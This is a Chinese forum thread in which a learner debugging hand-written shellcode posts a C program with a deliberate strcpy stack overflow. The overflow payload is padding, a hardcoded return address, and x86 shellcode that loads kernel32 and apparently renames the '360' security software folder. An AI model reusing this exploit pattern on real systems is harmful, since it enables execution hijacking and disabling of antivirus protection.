鱼C论坛

 找回密码
 立即注册
查看: 3267|回复: 4

换编码_转_机器码_待解决

[复制链接]
发表于 2019-5-10 16:16:50 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能^_^

您需要 登录 才可以下载或查看,没有账号?立即注册

x
本帖最后由 涛4091 于 2023-2-23 11:05 编辑

批注 2019-05-10 144650.png

地址为什么自动加上了 ff
小甲鱼最新课程 -> https://ilovefishc.com
回复

使用道具 举报

发表于 2019-5-10 17:35:18 | 显示全部楼层
贴代码
小甲鱼最新课程 -> https://ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2019-5-10 17:36:32 | 显示全部楼层
本帖最后由 jackz007 于 2019-5-10 17:45 编辑

     既然是地址,那就很可能是重定位项,从文件中读取到的数值和实际加载后的数值不一样很正常。

     楼主这是在切分汇编指令,自己动手写反汇编引擎?很 NB 嘛!
小甲鱼最新课程 -> https://ilovefishc.com
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-5-10 19:59:12 | 显示全部楼层
jackz007 发表于 2019-5-10 17:36
既然是地址,那就很可能是重定位项,从文件中读取到的数值和实际加载后的数值不一样很正常。

      ...

写shellcode
小甲鱼最新课程 -> https://ilovefishc.com
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-5-10 20:02:14 | 显示全部楼层

呐 代码

  1. #include<windows.h>
  2. #include<stdio.h>

  3. char input[]=
  4. "\x41\x41\x41\x41"
  5. "\x41\x41\x41\x41"
  6. "\x41\x41\x41\x41"
  7. "\x6b\x8c\x49\x7e"

  8. "\x55"
  9. "\x8B\xEC"
  10. "\x83\xEC\x20"
  11. "\xB8\x6B\x65\x72\x6E"
  12. "\x89\x45\xF0"
  13. "\xB8\x65\x6C\x33\x32"
  14. "\x89\x45\xF4"
  15. "\xB8\x2E\x64\x6C\x6C"
  16. "\x89\x45\xF8"
  17. "\x8D\x45\xF0"
  18. "\x50"
  19. "\xBA\x7B\x1D\x80\x7C"
  20. "\xFF\xD2"
  21. "\x55"
  22. "\x8B\xEC"
  23. "\x83\xEC\x30"
  24. "\xB8\x43\x3A\x5C\x5C"
  25. "\x89\x45\xD0"
  26. "\xB8\x50\x72\x6F\x67"
  27. "\x89\x45\xD4"
  28. "\xB8\x72\x61\x6D\x20"
  29. "\x89\x45\xD8"
  30. "\xB8\x46\x69\x6C\x65"
  31. "\x89\x45\xDC"
  32. "\xB8\x73\x5C\x5C\x33"
  33. "\x89\x45\xE0"
  34. "\xB8\x36\x30\x00\x00"
  35. "\x89\x45\xE4"
  36. "\x8D\x7D\xD0"
  37. "\xB8\x43\x3A\x5C\x5C"
  38. "\x89\x45\xE8"
  39. "\xB8\x50\x72\x6F\x67"
  40. "\x89\x45\xEC"
  41. "\xB8\x72\x61\x6D\x20"
  42. "\x89\x45\xF0"
  43. "\xB8\x46\x69\x6C\x65"
  44. "\x89\x45\xF4"
  45. "\xB8\x73\x5C\x5C\x33"
  46. "\x89\x45\xF8"
  47. "\xB8\x36\x30\x31\x00"
  48. "\x89\x45\xFC"
  49. "\x8D\x75\xE8"
  50. "\x56"
  51. "\x57"
  52. "\xB8\xA7\x5E\x83\x7C"
  53. "\xFF\xD0";


  54. int main()
  55. {
  56.         char buff[8];
  57.         LoadLibrary("user32.dll");
  58.         strcpy(buff,input);
  59.         return 0;
  60. }
复制代码
小甲鱼最新课程 -> https://ilovefishc.com
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2025-6-10 00:25

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表